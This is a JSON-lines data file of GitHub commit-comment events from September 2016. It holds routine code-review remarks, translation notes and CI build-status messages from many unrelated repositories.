{"id":"4565355155","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028720,"position":25,"line":38,"path":"00-HTML-CSS-basics/index.html","commit_id":"ae3f2058625a8ecec8c1b4a72626284dd8fb5382","created_at":"2016-09-15T00:00:26Z","updated_at":"2016-09-15T00:00:26Z","body":"You could try with `type=\"date\"`"}},"created_at":"2016-09-15T00:00:26Z"}
{"id":"4565357479","type":"CommitCommentEvent","actor":{"login":"Liunkae"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19028726,"position":null,"line":null,"path":null,"commit_id":"51f654c1f7a970c0f755c01057ead35d1d2fb2e3","created_at":"2016-09-15T00:01:03Z","updated_at":"2016-09-15T00:01:03Z","body":"++, thanks"}},"created_at":"2016-09-15T00:01:03Z"}
{"id":"4565359496","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19028732,"position":7,"line":16,"path":"src/node_jsvmapi_types.h","commit_id":"649d595f2a8ed1e65b7ffbd3d1793cd3bc750dc6","created_at":"2016-09-15T00:01:41Z","updated_at":"2016-09-15T00:01:41Z","body":"Correct.  It must not be exposed to the module authors.  It is an implementation detail meant to be unknown to module code.\r\n\r\nAlso it doesn't need to be typedef'ed and can instead simply be\r\n```C++\r\nstruct napi_func_cb_info_wrapper {\r\n  napi_value Arguments;\r\n  napi_persistent ReturnValue;\r\n};\r\n```"}},"created_at":"2016-09-15T00:01:41Z"}
{"id":"4565362340","type":"CommitCommentEvent","actor":{"login":"morales-jose"},"repo":{"name":"tectijuana/interfaz"},"payload":{"comment":{"id":19028737,"position":null,"line":null,"path":null,"commit_id":"2db72cff6e6ee5bef7cf144521ddcc398210ae9c","created_at":"2016-09-15T00:02:30Z","updated_at":"2016-09-15T00:02:30Z","body":"NO es la 10 pliss"}},"created_at":"2016-09-15T00:02:30Z"}
{"id":"4565367747","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"globant-ui/startup"},"payload":{"comment":{"id":19028745,"position":null,"line":null,"path":null,"commit_id":"ae3f2058625a8ecec8c1b4a72626284dd8fb5382","created_at":"2016-09-15T00:04:08Z","updated_at":"2016-09-15T00:04:08Z","body":"Review, finished. Great job! Try to finish CSS exercises for tomorrow."}},"created_at":"2016-09-15T00:04:08Z"}
{"id":"4565368236","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19028748,"position":null,"line":null,"path":null,"commit_id":"5207ef8c41a4215ef0727e44f76c5fa5906d3cfc","created_at":"2016-09-15T00:04:17Z","updated_at":"2016-09-15T00:04:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;LBCSCKtp&#x2F;9-create-domain-model-repository-domain-model-validator-for-activity\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create domain model, repository, domain model validator for Activity</a>"}},"created_at":"2016-09-15T00:04:17Z"}
{"id":"4565375260","type":"CommitCommentEvent","actor":{"login":"kevgliss"},"repo":{"name":"Netflix/lemur"},"payload":{"comment":{"id":19028771,"position":6,"line":19,"path":".travis.yml","commit_id":"d850d677da4954f0e1f2d6340fc92e4cee9e36be","created_at":"2016-09-15T00:06:13Z","updated_at":"2016-09-15T00:06:13Z","body":"I think you are correct, but psql doesn't seem to throw an error. Looking at: https://github.com/Netflix/lemur/blob/master/lemur/tests/conf.py#L53. The password is `lemur` so that means one way or the other postgres is dropping single quotes. That's the only way I can think of that the tests are successfully running. "}},"created_at":"2016-09-15T00:06:13Z"}
{"id":"4565375451","type":"CommitCommentEvent","actor":{"login":"nx111"},"repo":{"name":"nx111/oscam"},"payload":{"comment":{"id":19028772,"position":null,"line":null,"path":null,"commit_id":"616fe8793175a5dedc35e688bc400b3098570c9e","created_at":"2016-09-15T00:06:16Z","updated_at":"2016-09-15T00:06:16Z","body":"Need more detail."}},"created_at":"2016-09-15T00:06:16Z"}
{"id":"4565378193","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":19028775,"position":null,"line":null,"path":null,"commit_id":"d463b61e9bb24452233f2a7fa725aef1dc6da879","created_at":"2016-09-15T00:07:07Z","updated_at":"2016-09-15T00:07:07Z","body":"Chnages to work Autosuggession in Matter and Document page. \r\n"}},"created_at":"2016-09-15T00:07:07Z"}
{"id":"4565379814","type":"CommitCommentEvent","actor":{"login":"jgravois"},"repo":{"name":"Esri/developer-support"},"payload":{"comment":{"id":19028778,"position":null,"line":null,"path":null,"commit_id":"6344e6756d69eb3ccafd52e7ad8eb81192713c16","created_at":"2016-09-15T00:07:36Z","updated_at":"2016-09-15T00:07:36Z","body":"> Where in the Desktop version of Github is the Pull Request command?\r\n\r\nI've never seen functionality in a client app for git to help open Pull Requests. You'll need to do it directly on GitHub.\r\n\r\n1. navigate to https://github.com/Esri/developer-support/pulls\r\n2. click `New Pull Request`\r\n\r\nOnce you've 'opened a pull request' you'll choose `gh-pages` as the base branch and compare it to the branch where you committed your own changes, whether they've already been pushed to this repository or your own fork.\r\n\r\nthis is a workflow that allows people to *propose* merging new work, whether they have write permission to a codebase or not. \r\n"}},"created_at":"2016-09-15T00:07:36Z"}
{"id":"4565388866","type":"CommitCommentEvent","actor":{"login":"cheezgi"},"repo":{"name":"cheezgi/stones"},"payload":{"comment":{"id":19028801,"position":null,"line":null,"path":null,"commit_id":"081171eef97b2b84de5ca1d2bcc4f864c71f6f79","created_at":"2016-09-15T00:10:26Z","updated_at":"2016-09-15T00:10:26Z","body":"Git told me that all the lines changed, I'm not sure what happened. Forgot about these changes though."}},"created_at":"2016-09-15T00:10:26Z"}
{"id":"4565398793","type":"CommitCommentEvent","actor":{"login":"JDStephenson"},"repo":{"name":"CreativeComputing2035/concretepoetry_JD_Stephenson2"},"payload":{"comment":{"id":19028818,"position":27,"line":27,"path":"index1.html","commit_id":"3ee8077fe2c5e2f2aab0b88fa86a7cd2a73bb25d","created_at":"2016-09-15T00:13:26Z","updated_at":"2016-09-15T00:13:26Z","body":"fix html"}},"created_at":"2016-09-15T00:13:26Z"}
{"id":"4565405680","type":"CommitCommentEvent","actor":{"login":"Gh0stBlade"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19028841,"position":null,"line":null,"path":null,"commit_id":"121247f722b26e23b3e32b20b88a7d8ac4c8cafd","created_at":"2016-09-15T00:15:34Z","updated_at":"2016-09-15T00:15:34Z","body":"@Legend286 \r\n\r\nI understand your frustration in regards to the compiling process of OpenTomb. The team have discussed improving the build system on various occasions. Due to limited resources and time, nothing has been done yet. The readme.md included in the repo has basic information on how to compile the engine. I'm fully aware this is no where near enough, is also outdated and should explicitly state which versions of the libraries should be used.\r\n\r\nI'm going to see if I can pull someone from the team to update this information as I'm pre-occupied at the \r\nmoment. I'm also using custom hacks (undefining macros) to build the engine because I get problems myself. We currently use CMake to setup the dependencies and generate project files. \r\n\r\nBullet and FreeType is included so you don't need to compile those libraries.\r\n\r\nYou'll have to compile the following libraries and link them:\r\nLua 5.2\r\nOpenAL\r\nLibpng 1.2\r\nSDL 2.0.3/2.0.4\r\nZlib\r\n\r\nI'm going to lock this, further discussion should continue here: https://github.com/opentomb/OpenTomb/issues/383\r\n\r\nCheers."}},"created_at":"2016-09-15T00:15:34Z"}
{"id":"4565416050","type":"CommitCommentEvent","actor":{"login":"olalonde"},"repo":{"name":"olalonde/pgtools"},"payload":{"comment":{"id":19028861,"position":null,"line":null,"path":null,"commit_id":"5c729f890d1a7deb785e922d10a3691b1aa6335d","created_at":"2016-09-15T00:18:45Z","updated_at":"2016-09-15T00:18:45Z","body":"@bcoe great, I also do this in more recent projects, along with https://github.com/semantic-release/semantic-release for versioning 👍 "}},"created_at":"2016-09-15T00:18:45Z"}
{"id":"4565418583","type":"CommitCommentEvent","actor":{"login":"adamjv90"},"repo":{"name":"jaredpalmer/react-production-starter"},"payload":{"comment":{"id":19028865,"position":null,"line":null,"path":null,"commit_id":"beda13dcebe72fc909451f5ee02b02d50c5a9b2e","created_at":"2016-09-15T00:19:30Z","updated_at":"2016-09-15T00:19:30Z","body":"do you plan to upgrade to react router 4.0 as well? https://github.com/ReactTraining/react-router/tree/v4"}},"created_at":"2016-09-15T00:19:30Z"}
{"id":"4565419707","type":"CommitCommentEvent","actor":{"login":"wuhuhuan"},"repo":{"name":"wuhuhuan/cccc"},"payload":{"comment":{"id":19028868,"position":null,"line":null,"path":null,"commit_id":"5bee794ead53272a415c4d3dbbad86a23b2bce16","created_at":"2016-09-15T00:19:50Z","updated_at":"2016-09-15T00:19:50Z","body":"aa"}},"created_at":"2016-09-15T00:19:50Z"}
{"id":"4565419806","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"rvl/bower2nix"},"payload":{"comment":{"id":19028869,"position":null,"line":null,"path":null,"commit_id":"bbecd10b0083c36d28c43b16c5b0d63227fa81e8","created_at":"2016-09-15T00:19:52Z","updated_at":"2016-09-15T00:19:52Z","body":"Yayayay! Thank you so much!"}},"created_at":"2016-09-15T00:19:52Z"}
{"id":"4565428601","type":"CommitCommentEvent","actor":{"login":"danmackay"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19028896,"position":null,"line":null,"path":null,"commit_id":"42e05be8671e149f79307145eda78892003279dc","created_at":"2016-09-15T00:22:41Z","updated_at":"2016-09-15T00:22:41Z","body":"I dont suppose support for discovery.ca could also be added by any chance"}},"created_at":"2016-09-15T00:22:41Z"}
{"id":"4565431024","type":"CommitCommentEvent","actor":{"login":"timheap"},"repo":{"name":"torchbox/wagtail"},"payload":{"comment":{"id":19028901,"position":35,"line":382,"path":"docs/reference/hooks.rst","commit_id":"8b9b2ced36c641d08b364725f3ab4b530b5eaec3","created_at":"2016-09-15T00:23:28Z","updated_at":"2016-09-15T00:23:28Z","body":"This import is not used in the example"}},"created_at":"2016-09-15T00:23:28Z"}
{"id":"4565433284","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19028904,"position":null,"line":null,"path":null,"commit_id":"8186fd100e8c9e01a07b68f453c7b086584aee9a","created_at":"2016-09-15T00:24:14Z","updated_at":"2016-09-15T00:24:14Z","body":"It will make the monster avoid the field harder, I don't think the monster should NOT avoid the tile if it is already affected by the condition, as I already saw strange behavior with TFS 1.x. Player would make use of a field to make the monster dance step over it. I also don't know why it should be so harded to avoided with a 18 multiplier if the monster is not immune/affected at all."}},"created_at":"2016-09-15T00:24:14Z"}
{"id":"4565435075","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19028911,"position":64,"line":64,"path":"spec/compiler/codegen/extern_spec.cr","commit_id":"dcfd9031c5723c34942f74a55fcd874c9d1dc4e0","created_at":"2016-09-15T00:24:50Z","updated_at":"2016-09-15T00:24:50Z","body":"`insance` -> `instance`"}},"created_at":"2016-09-15T00:24:50Z"}
{"id":"4565436604","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19028913,"position":81,"line":81,"path":"spec/compiler/codegen/extern_spec.cr","commit_id":"dcfd9031c5723c34942f74a55fcd874c9d1dc4e0","created_at":"2016-09-15T00:25:18Z","updated_at":"2016-09-15T00:25:18Z","body":"ditto"}},"created_at":"2016-09-15T00:25:18Z"}
{"id":"4565441024","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19028925,"position":7,"line":16,"path":"src/node_jsvmapi_types.h","commit_id":"649d595f2a8ed1e65b7ffbd3d1793cd3bc750dc6","created_at":"2016-09-15T00:26:47Z","updated_at":"2016-09-15T00:26:47Z","body":"You can simplify the code quite a bit by using the V8 types directly in this struct as well.  You can do this since it is only used within the implementation of the API and not exposed to the users of the API.\r\n\r\nAlso, wrapper is not really the right term since it isn't wrapping a `napi_func_cb_info`.  Instead it is providing the implementation, so a name like `napi_func_cb_info_impl` would be better.\r\n\r\nSo in addition to being moved to the .cc file, the struct should look like this:\r\n```C++\r\nstruct napi_func_cb_info_impl {\r\n  const v8::Arguments* Arguments;\r\n  v8::Persistent<v8::Value>* ReturnValue;\r\n};\r\n```\r\n\r\nThen you can simply copy the arguments and return value pointer from `v8impl::FunctionCallback` directly into the struct and you won't need the `JsFunctionCallbackInfoFromV8FunctionCallbackInfo` helper or the other conversion helpers at all.  Much simpler."}},"created_at":"2016-09-15T00:26:47Z"}
{"id":"4565443364","type":"CommitCommentEvent","actor":{"login":"bcoe"},"repo":{"name":"olalonde/pgtools"},"payload":{"comment":{"id":19028927,"position":null,"line":null,"path":null,"commit_id":"5c729f890d1a7deb785e922d10a3691b1aa6335d","created_at":"2016-09-15T00:27:36Z","updated_at":"2016-09-15T00:27:36Z","body":"@olalonde nice, I've been wanting to take the leap and move towards a fully automated approach like that."}},"created_at":"2016-09-15T00:27:36Z"}
{"id":"4565446935","type":"CommitCommentEvent","actor":{"login":"wuhuhuan"},"repo":{"name":"wuhuhuan/cccc"},"payload":{"comment":{"id":19028931,"position":1,"line":1,"path":"README.md","commit_id":"5bee794ead53272a415c4d3dbbad86a23b2bce16","created_at":"2016-09-15T00:28:50Z","updated_at":"2016-09-15T00:28:50Z","body":"bbb"}},"created_at":"2016-09-15T00:28:50Z"}
{"id":"4565448297","type":"CommitCommentEvent","actor":{"login":"femsick"},"repo":{"name":"femsick/risingstars"},"payload":{"comment":{"id":19028934,"position":96,"line":193,"path":"app/auth/register.js","commit_id":"5f536c17a3e78effa1960f608c35633c8c34b481","created_at":"2016-09-15T00:29:17Z","updated_at":"2016-09-15T00:29:17Z","body":"Ideally we would be pulling this back from the API on loading the site so we always have the latest data. I know that states are a lot more static, but for things like cities, counties, zip codes and schools etc we should try to make them all dynamic and not statically coded. OR If they are statically coded, move this to config.js or a constants.js file that we can have all constants in one place and not mixed in with all the js code. Make sense? If you would like I can create a constants service for this purpose and check it in tonight. Let me know."}},"created_at":"2016-09-15T00:29:17Z"}
{"id":"4565449506","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19028937,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T00:29:41Z","updated_at":"2016-09-15T00:29:41Z","body":"Sorry to nitpick, but does this render to a link since there's no `for-label`? I also wonder if it is dangerous to add a `for-label` in this case..."}},"created_at":"2016-09-15T00:29:41Z"}
{"id":"4565449937","type":"CommitCommentEvent","actor":{"login":"femsick"},"repo":{"name":"femsick/risingstars"},"payload":{"comment":{"id":19028940,"position":101,"line":198,"path":"app/auth/register.js","commit_id":"5f536c17a3e78effa1960f608c35633c8c34b481","created_at":"2016-09-15T00:29:49Z","updated_at":"2016-09-15T00:29:49Z","body":"I have done this as well, but let's refrain from checking in console.logs and commented out code."}},"created_at":"2016-09-15T00:29:49Z"}
{"id":"4565449966","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19028941,"position":null,"line":null,"path":null,"commit_id":"da61d1caad411e6038ea5e0c3cbda433b52c06f5","created_at":"2016-09-15T00:29:50Z","updated_at":"2016-09-15T00:29:50Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 37](http://teamcity.otenv.com/viewLog.html?buildId=5216380&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-15T00:29:50Z"}
{"id":"4565453194","type":"CommitCommentEvent","actor":{"login":"femsick"},"repo":{"name":"femsick/risingstars"},"payload":{"comment":{"id":19028959,"position":23,"line":152,"path":"app/auth/register.tpl.html","commit_id":"5f536c17a3e78effa1960f608c35633c8c34b481","created_at":"2016-09-15T00:30:50Z","updated_at":"2016-09-15T00:30:50Z","body":"Is your bootstrap all being coded to have a fallback for mobile? col-md and col-xs..."}},"created_at":"2016-09-15T00:30:50Z"}
{"id":"4565455480","type":"CommitCommentEvent","actor":{"login":"jbclements"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19028966,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T00:31:35Z","updated_at":"2016-09-15T00:31:35Z","body":"no, that's fine... I went through the same thought process. It *doesn't* render as a link, and I decided I didn't want to wrestle with that import."}},"created_at":"2016-09-15T00:31:35Z"}
{"id":"4565457834","type":"CommitCommentEvent","actor":{"login":"femsick"},"repo":{"name":"femsick/risingstars"},"payload":{"comment":{"id":19028971,"position":27,"line":14,"path":"app/auth/register/profile/athlete.tpl.html","commit_id":"5f536c17a3e78effa1960f608c35633c8c34b481","created_at":"2016-09-15T00:32:16Z","updated_at":"2016-09-15T00:32:16Z","body":"Should always use === instead of ==. Javascript best practice.  A lot of these things are caught by JSHINT. So please don't turn it off locally on your machine or check in code without doing \"grunt build\" to make sure it is all valid javascript."}},"created_at":"2016-09-15T00:32:16Z"}
{"id":"4565458353","type":"CommitCommentEvent","actor":{"login":"noahmanger"},"repo":{"name":"18F/fec-cms"},"payload":{"comment":{"id":19028974,"position":17,"line":17,"path":"fec/data_loader/management/commands/load_press_releases.py","commit_id":"6a5c66ebfbd38a9afe7788d541925ee7aab65008","created_at":"2016-09-15T00:32:27Z","updated_at":"2016-09-15T00:32:27Z","body":"I love what I'm seeing here because this would be very easy for me or someone else to modify and refine. 🎉 "}},"created_at":"2016-09-15T00:32:27Z"}
{"id":"4565458597","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"bradfitz/issuemirror"},"payload":{"comment":{"id":19028975,"position":null,"line":null,"path":null,"commit_id":"635c1c53868e7eb76fc78d4d27a7dce75c9b2320","created_at":"2016-09-15T00:32:32Z","updated_at":"2016-09-15T00:32:32Z","body":"Any reason this doesn't follow the `cmd/mirrorissues` [pattern](https://godoc.org/golang.org/x/tools/cmd)? It might be harder to tell it's a command rather than a library at a glance this way."}},"created_at":"2016-09-15T00:32:32Z"}
{"id":"4565460412","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19028980,"position":null,"line":null,"path":null,"commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-15T00:33:10Z","updated_at":"2016-09-15T00:33:10Z","body":"轉換用 `Translator`，反查用 `Filter`。已經有根據字符集過濾結果的 `charset_filter`，建議本案命名爲 `codepoint_translator`、`codepoint_filter`。"}},"created_at":"2016-09-15T00:33:10Z"}
{"id":"4565461864","type":"CommitCommentEvent","actor":{"login":"dasl-"},"repo":{"name":"dasl-/ofxFlowTools"},"payload":{"comment":{"id":19028983,"position":7,"line":41,"path":"src/particles/ftParticleFlow.cpp","commit_id":"e8808229967d04461156e8bce298c216fbb8db2f","created_at":"2016-09-15T00:33:39Z","updated_at":"2016-09-15T00:33:39Z","body":"woops, undo this."}},"created_at":"2016-09-15T00:33:39Z"}
{"id":"4565463198","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":19028989,"position":121,"line":114,"path":"application-testing.md","commit_id":"39c39061cfa8322b86145490fa5973026b42e197","created_at":"2016-09-15T00:34:06Z","updated_at":"2016-09-15T00:34:06Z","body":"这里的表格需要翻译，参照：https://github.com/laravel-china/laravel-docs/blob/5.2/testing.md#使用表单\r\n\r\n    "}},"created_at":"2016-09-15T00:34:06Z"}
{"id":"4565464068","type":"CommitCommentEvent","actor":{"login":"derekcollison"},"repo":{"name":"nats-io/graft"},"payload":{"comment":{"id":19028991,"position":41,"line":111,"path":"node.go","commit_id":"11b91377c7d0ff5424b9c8150025e008a5513f3a","created_at":"2016-09-15T00:34:22Z","updated_at":"2016-09-15T00:34:22Z","body":"Why make it blocking?"}},"created_at":"2016-09-15T00:34:22Z"}
{"id":"4565465033","type":"CommitCommentEvent","actor":{"login":"derekcollison"},"repo":{"name":"nats-io/graft"},"payload":{"comment":{"id":19028994,"position":41,"line":111,"path":"node.go","commit_id":"11b91377c7d0ff5424b9c8150025e008a5513f3a","created_at":"2016-09-15T00:34:40Z","updated_at":"2016-09-15T00:34:40Z","body":"nvm.."}},"created_at":"2016-09-15T00:34:40Z"}
{"id":"4565465089","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19028995,"position":null,"line":null,"path":null,"commit_id":"da61d1caad411e6038ea5e0c3cbda433b52c06f5","created_at":"2016-09-15T00:34:41Z","updated_at":"2016-09-15T00:34:41Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 37](http://teamcity.otenv.com/viewLog.html?buildId=5216380&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:04:51"}},"created_at":"2016-09-15T00:34:41Z"}
{"id":"4565465396","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19028997,"position":null,"line":null,"path":null,"commit_id":"da61d1caad411e6038ea5e0c3cbda433b52c06f5","created_at":"2016-09-15T00:34:47Z","updated_at":"2016-09-15T00:34:47Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 38](http://teamcity.otenv.com/viewLog.html?buildId=5216440&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-15T00:34:47Z"}
{"id":"4565466177","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029000,"position":7,"line":16,"path":"src/node_jsvmapi_types.h","commit_id":"649d595f2a8ed1e65b7ffbd3d1793cd3bc750dc6","created_at":"2016-09-15T00:35:06Z","updated_at":"2016-09-15T00:35:06Z","body":"Oh we also noticed that after doing this simplification, the ReturnValue field wouldn't need to be a pointer and you can use it directly instead of having a local variable."}},"created_at":"2016-09-15T00:35:06Z"}
{"id":"4565467936","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":19029012,"position":128,"line":119,"path":"application-testing.md","commit_id":"39c39061cfa8322b86145490fa5973026b42e197","created_at":"2016-09-15T00:35:42Z","updated_at":"2016-09-15T00:35:42Z","body":"    如果你的表单包含 `上次文件` 的输入框类型"}},"created_at":"2016-09-15T00:35:42Z"}
{"id":"4565469648","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"LightTable/LightTable"},"payload":{"comment":{"id":19029015,"position":4,"line":11,"path":"README.md","commit_id":"7fc63e6c141c77c282f4dbbe299c0b8b42ed8065","created_at":"2016-09-15T00:36:17Z","updated_at":"2016-09-15T00:36:17Z","body":"If one of the maintainers is an \"Apple Developer\" here's [a guide](https://successfulsoftware.net/2012/08/30/how-to-sign-your-mac-os-x-app-for-gatekeeper/) to sign the application."}},"created_at":"2016-09-15T00:36:17Z"}
{"id":"4565469888","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19029016,"position":null,"line":null,"path":null,"commit_id":"da61d1caad411e6038ea5e0c3cbda433b52c06f5","created_at":"2016-09-15T00:36:22Z","updated_at":"2016-09-15T00:36:22Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 38](http://teamcity.otenv.com/viewLog.html?buildId=5216440&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:01:34"}},"created_at":"2016-09-15T00:36:22Z"}
{"id":"4565470169","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":19029018,"position":null,"line":null,"path":null,"commit_id":"feb139aeabfc1e36a034ed1d3456c8f070f3b4af","created_at":"2016-09-15T00:36:27Z","updated_at":"2016-09-15T00:36:27Z","body":" To open Matter Landing Page in the same tab in MatterDashboard"}},"created_at":"2016-09-15T00:36:27Z"}
{"id":"4565472739","type":"CommitCommentEvent","actor":{"login":"HichamDiouri"},"repo":{"name":"HichamDiouri/Coolose"},"payload":{"comment":{"id":19029021,"position":5,"line":10,"path":"Hi/src/hi/Hi.java","commit_id":"6c8350c0590f8f7d9f20578fc40203e9603f5b11","created_at":"2016-09-15T00:37:21Z","updated_at":"2016-09-15T00:37:21Z","body":"Je prefere avoir mon nom de famille"}},"created_at":"2016-09-15T00:37:21Z"}
{"id":"4565473355","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":19029022,"position":324,"line":340,"path":"application-testing.md","commit_id":"39c39061cfa8322b86145490fa5973026b42e197","created_at":"2016-09-15T00:37:33Z","updated_at":"2016-09-15T00:37:33Z","body":"    Assert that the view has a given list of bound data.\r\n\r\n翻译为：\r\n\r\n    断言响应视图里存在输入数组里的所有数据"}},"created_at":"2016-09-15T00:37:33Z"}
{"id":"4565474235","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029026,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-15T00:37:51Z","updated_at":"2016-09-15T00:37:51Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2334 of 2335 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T00:37:51Z"}
{"id":"4565474780","type":"CommitCommentEvent","actor":{"login":"HichamDiouri"},"repo":{"name":"HichamDiouri/Coolose"},"payload":{"comment":{"id":19029029,"position":12,"line":17,"path":"Hi/src/hi/Hi.java","commit_id":"6c8350c0590f8f7d9f20578fc40203e9603f5b11","created_at":"2016-09-15T00:38:02Z","updated_at":"2016-09-15T00:38:02Z","body":"Tu pense que c'est plus loin mais t'es encore debutant"}},"created_at":"2016-09-15T00:38:02Z"}
{"id":"4565474984","type":"CommitCommentEvent","actor":{"login":"etlgfx"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19029030,"position":292,"line":292,"path":"lib/RuleSet.js","commit_id":"a53799c0ac58983860a27648cdc8519b6a562b89","created_at":"2016-09-15T00:38:06Z","updated_at":"2016-09-15T00:38:06Z","body":"you probably meant items[i](str) ?\r\n\r\nSame in the orMatcher() method above."}},"created_at":"2016-09-15T00:38:06Z"}
{"id":"4565480279","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":19029039,"position":165,"line":156,"path":"database-testing.md","commit_id":"39c39061cfa8322b86145490fa5973026b42e197","created_at":"2016-09-15T00:39:58Z","updated_at":"2016-09-15T00:39:58Z","body":"上面这个代码块里有三句注释，麻烦翻译一下。"}},"created_at":"2016-09-15T00:39:58Z"}
{"id":"4565480653","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19029042,"position":73,"line":73,"path":"ryu/app/simple_switch_stp_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-15T00:40:06Z","updated_at":"2016-09-15T00:40:06Z","body":"以下の様にsimple_switch_13.SimpleSwitch13を継承し\r\nswitch_features_handlerとadd_flowを削除しました。\r\n\r\nimport simple_switch_13\r\nclass SimpleSwitch13(simple_switch_13.SimpleSwitch13):\r\n\r\nRyu-bookの内容に従いアプリケーションを実行したところ、\r\nポートステータスの管理部分にバグがありましたので、\r\n別コミットにて修正します。\r\n"}},"created_at":"2016-09-15T00:40:06Z"}
